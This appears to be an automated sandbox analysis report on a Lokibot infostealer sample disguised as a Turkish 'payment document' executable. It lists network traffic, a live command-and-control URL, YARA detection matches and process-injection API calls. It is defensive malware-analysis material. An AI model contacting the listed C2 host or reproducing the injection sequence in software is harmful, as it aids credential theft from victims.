Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:49 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:53 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:26:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:00 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:02 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:15 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:18 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:30 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:31 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:32 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:33 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Mon, 30 Sep 2024 22:27:34 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: Odeme_belgesi.exe, 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp, Odeme_belgesi.exe, 00000001.00000002.2914113707.000000000049F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://solutviewmen.viewdns.net/bdifygidj/five/fre.php
Source: Odeme_belgesi.exe, 00000001.00000002.2914383353.0000000001268000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://solutviewmen.viewdns.net/bdifygidj/five/fre.phpwD
Source: Odeme_belgesi.exe, Odeme_belgesi.exe, 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Odeme_belgesi.exe.44788b8.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Odeme_belgesi.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Odeme_belgesi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Odeme_belgesi.exe.44788b8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1688230207.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1688230207.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.2914113707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1689546707.0000000004478000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Odeme_belgesi.exe PID: 6912, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: Odeme_belgesi.exe PID: 7124, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

PE file contains section with special chars

Source: Odeme_belgesi.exe

Static PE information: section name: pNld"O

PE file has nameless sections

Source: Odeme_belgesi.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6ED2D0 NtReadVirtualMemory,	0_2_0A6ED2D0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6ED800 NtSetContextThread,	0_2_0A6ED800
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6ED6A8 NtWriteVirtualMemory,	0_2_0A6ED6A8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6ED488 NtResumeThread,	0_2_0A6ED488
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6ED2C8 NtReadVirtualMemory,	0_2_0A6ED2C8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6ED6A1 NtWriteVirtualMemory,	0_2_0A6ED6A1
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6ED7F9 NtSetContextThread,	0_2_0A6ED7F9
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6ED480 NtResumeThread,	0_2_0A6ED480

Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E46D0	0_2_028E46D0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028ED310	0_2_028ED310
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E08E0	0_2_028E08E0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028EBCF8	0_2_028EBCF8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E3811	0_2_028E3811
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E2D89	0_2_028E2D89
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028EB980	0_2_028EB980
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028EF590	0_2_028EF590
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E2548	0_2_028E2548
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E6D50	0_2_028E6D50
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E4685	0_2_028E4685
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028EAAE0	0_2_028EAAE0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E6B89	0_2_028E6B89
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E6B98	0_2_028E6B98
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028EA3F8	0_2_028EA3F8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E6758	0_2_028E6758
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E6768	0_2_028E6768
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E24EB	0_2_028E24EB
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E5580	0_2_028E5580
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028EB198	0_2_028EB198
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E6109	0_2_028E6109
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E6118	0_2_028E6118
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E1937	0_2_028E1937
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E6943	0_2_028E6943
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E6950	0_2_028E6950
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_028E5573	0_2_028E5573
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF4D68	0_2_04FF4D68
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF6FA0	0_2_04FF6FA0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF88F0	0_2_04FF88F0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF6888	0_2_04FF6888
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF79F9	0_2_04FF79F9
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF5BF8	0_2_04FF5BF8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF74C9	0_2_04FF74C9
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF7471	0_2_04FF7471
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF05E8	0_2_04FF05E8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF05D8	0_2_04FF05D8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF96F0	0_2_04FF96F0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF96E0	0_2_04FF96E0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF87F8	0_2_04FF87F8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF67E0	0_2_04FF67E0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFA0EA	0_2_04FFA0EA
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFF198	0_2_04FFF198
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF1C58	0_2_04FF1C58
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF1C4B	0_2_04FF1C4B
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFAE30	0_2_04FFAE30
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFAE22	0_2_04FFAE22
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFAFE8	0_2_04FFAFE8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF6FE0	0_2_04FF6FE0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFBF48	0_2_04FFBF48
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFF8E8	0_2_04FFF8E8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF1810	0_2_04FF1810
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF1800	0_2_04FF1800
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFA968	0_2_04FFA968
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFA95A	0_2_04FFA95A
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFEAE0	0_2_04FFEAE0
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF1A18	0_2_04FF1A18
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FF1A08	0_2_04FF1A08
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFABB8	0_2_04FFABB8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_04FFABA8	0_2_04FFABA8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6EC658	0_2_0A6EC658
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6E2D52	0_2_0A6E2D52
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6E25D8	0_2_0A6E25D8
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6ED958	0_2_0A6ED958
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6EC64F	0_2_0A6EC64F
Source: C:\Users\user\Desktop\Odeme_belgesi.exe	Code function: 0_2_0A6E1E29	0_2_0A6E1E29
